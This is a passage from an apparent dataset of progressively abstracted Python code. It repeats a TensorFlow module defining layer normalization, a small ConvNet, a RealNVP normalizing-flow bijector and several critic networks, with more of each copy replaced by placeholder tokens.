scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n <function token>\n <function token>\n <function token>\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n <docstring token>\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n <docstring token>\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n <function token>\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n 